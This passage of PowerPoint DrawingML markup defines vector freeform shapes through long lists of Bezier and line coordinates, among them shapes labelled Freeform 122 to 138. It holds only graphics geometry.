                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="122" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="159" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="158" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="152" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="131" y="157"/>
                      <a:pt x="130" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="124" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="121" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="157" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="160" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="159" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="84" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>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4"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="49" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="45" y="122"/>
                      <a:pt x="45" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="45" y="133"/>
                      <a:pt x="45" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="121"/>
                      <a:pt x="37" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="36" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="36" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="37" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="47" y="150"/>
                      <a:pt x="51" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="157"/>
                      <a:pt x="61" y="161"/>
                      <a:pt x="66" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="69" y="170"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="66" y="177"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="182"/>
                      <a:pt x="65" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="194"/>
                      <a:pt x="69" y="196"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="196"/>
                      <a:pt x="72" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="68" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="96" y="185"/>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8"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="118" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="125" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="128" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="139" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="98"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>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4"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="116" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="61"/>
                      <a:pt x="106" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="103" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="91" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="38"/>
                      <a:pt x="94" y="36"/>
                      <a:pt x="97" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="100" y="38"/>
                      <a:pt x="101" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="106" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="99" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="87" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="39"/>
                      <a:pt x="86" y="41"/>
                      <a:pt x="86" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="82" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="79" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="77" y="46"/>
                      <a:pt x="77" y="44"/>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0"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="67" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="49"/>
                      <a:pt x="67" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="70" y="36"/>
                      <a:pt x="72" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="74" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="51"/>
                      <a:pt x="68" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="64" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="77" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="90" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="102" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="101" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="42"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="42"/>
                      <a:pt x="71" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71"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5" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3708"/>
                <a:ext cx="3"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0"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6" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="3708"/>
                <a:ext cx="3" cy="3"/>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2" y="2"/>
                      <a:pt x="2"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Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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2" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23"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4" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="4023"/>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Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="4027"/>
                <a:ext cx="187" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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20">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
